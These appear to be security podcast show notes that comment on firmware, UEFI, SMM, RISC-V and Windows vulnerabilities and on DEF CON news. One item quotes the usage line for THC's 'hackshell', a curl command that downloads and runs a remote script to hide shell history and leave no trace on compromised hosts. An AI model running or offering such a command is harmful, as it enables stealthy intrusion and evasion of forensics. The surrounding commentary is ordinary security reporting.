Cybersecurity Myths – Eugene Spafford – PSW #839

This is the crucial part: " In AMD-based machines, a safeguard known as TSeg prevents the computer's operating systems from writing to a protected part of memory meant to be reserved for System Management Mode known as System Management Random Access Memory or SMRAM. AMD's TClose feature, however, is designed to allow computers to remain compatible with older devices that use the same memory addresses as SMRAM, remapping other memory to those SMRAM addresses when it's enabled. Nissim and Okupski found that, with only the operating system's level of privileges, they could use that TClose remapping feature to trick the SMM code into fetching data they've tampered with, in a way that allows them to redirect the processor and cause it to execute their own code at the same highly privileged SMM level." - Also, the debate continues on whether this is a huge problem or not. People are dismissing these types of vulnerabilities for two reasons:

• Local Kernel-level privileges are required - There are so many ways to achieve this on Windows and Linux that I've lost count.
• Only nation-state attackers use exploits like this - There are so many exploits for UEFI that I've lost count. Why do we believe that only nation-state-level attackers will use them? Also, why do you not care about nation-state-level attacks? Oh, they won't go after you because you are not important enough? Every US-based company may face nation-state threat actors.

So, you know, just keep putting your head in the sand and pretend that we don't have to fix these vulnerabilities. That is, if you can even fix them, which is not even up to AMD, it's up to the OEM in many cases. I am waiting for Asus to push a UEFI update to fix this. I will just keep waiting...

Presented at BH 2024 this was the most amazing research I've seen. And yes it has to do with UEFI, and specifically Option ROMS. This Github repo contains sample code! You can infect the supply chain too, placing backdoored OROMs on devices that are then shipped with PCs. You can also create one yourself, but you then have to install the hardware on a computer. Or you can go through the kernel and userland to infect the OROM. Awesome examples here, and this is super difficult to detect, don't expect your EDR to pick up on this. In fact, there are some interesting tid bits in this research that speak directly to bypassing EDR and other Windows protections.

The article discusses a buffer overflow vulnerability in MSI firmware (CVE-2024-36877) within the System Management Mode (SMM) of UEFI. This vulnerability allows attackers to execute arbitrary code by exploiting an SMM handler, leading to potential firmware persistence and other severe security risks. There are so many incredible details here, including a full Github repo with all the examples. Definitely going to spend more time with this one!

The researchers had to work pretty hard in certain circumstances to get around select protections on the platform. After reviewing the research paper, I will say the Sonos platform security was not horrible. However, the persistence of the researchers really shined as they were able to get around these protections. For example, they were able to dump the eMMC through hardware, only to find out the filesystem was encrypted. They used previous research and built upon it to achieve their goals, one of which was to gain remote access and enable the microphone to record audio. Amazing work!

I've not yet attempted to get this going, but if you are interested in UEFI security you should check this out. This project was done by two Eclypsium researchers and presented at Black Hat 2024 Arsenal talks. Using Qemu you can emulate and boot UEFI, then start hunting for vulnerabilities that were put there on purpose.

Great tutorial on RFID hacking!

I would have just ordered a new keyboard, but finding 0-day post-authentication RCEs is way more fun!

I am excited about the RP2350, also used in the DEF CON badge, and not without more than its fair share of controversy.

Wow: "In this article, we demonstrate how a single vulnerability was exploited to bypass all mitigations and achieve a pre-authentication remote code execution (RCE) attack on Windows Server 2025, Which is considered the most secure Windows Server. It may seem fantastical in 2024, but it is a fact. Despite Microsoft's various fortifications to Windows for decades and we didn't see preauth 0-click RCE in Windows for years, we still can exploit a single memory corruption vulnerability to complete the entire attack. Looks like the system with "next-generation security improvements" fails to prevent the same old memory exploitation from 30 years ago this time."

Good news is that RISC-V stuff is still early in development, so hopefully they can get this fixed: "GhostWrite exploits a weakness in the processor’s memory management system, granting attackers unrestricted access to a device’s physical memory, bypassing critical security measures and potentially compromising sensitive data. Unlike previous attacks like Rowhammer, GhostWrite doesn’t require physical access to the chip." - It's basically a fancy LPE, and we all love some LPE.

A new tool from THC was released this week, hackshell.

Make BASH stealthy and hacker friendly with lots of bash functions

Usage:

source <(curl -SsfL https://thc.org/hs)

Some features:

unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
Upgrates to PTY shell (if reverse shell)
Creates hacker-friendly shortcuts, bash-functions and aliases
Static binary download by simple bin <command> (e.g. bin nmap)
Does not write ANY data to the harddrive
Leaves no trace
*Bill added to the source code something for PAUL

I'm not sure if this is a story or not, 'cause I've lost count of how many times my PII has been leaked. An all at once dump is significant, I suppose.

My friend, Chris Kubecka (@SecEvangelism) asked me to get people to spread this article around in hopes of protecting the journalist. #hacktivism

Now tell me that PCI hasn't made a difference...

I was out front of the LVCC when I saw a large gathering of hackers listening to someone speaking. I found out later it was this guy, Dmitry Grinberg. I heard murmurs about some developers getting credit in the badge that shouldn't, but here's the full story.

I interviewed Vivek Ramachandran, founder of SquareX last week and he alluded to some big news they were going to be dropping this past week. Here's a write-up of the announcement.

In other big news...Las Vegas is getting serious about protecting visitors from the evils that lurk around DEF CON.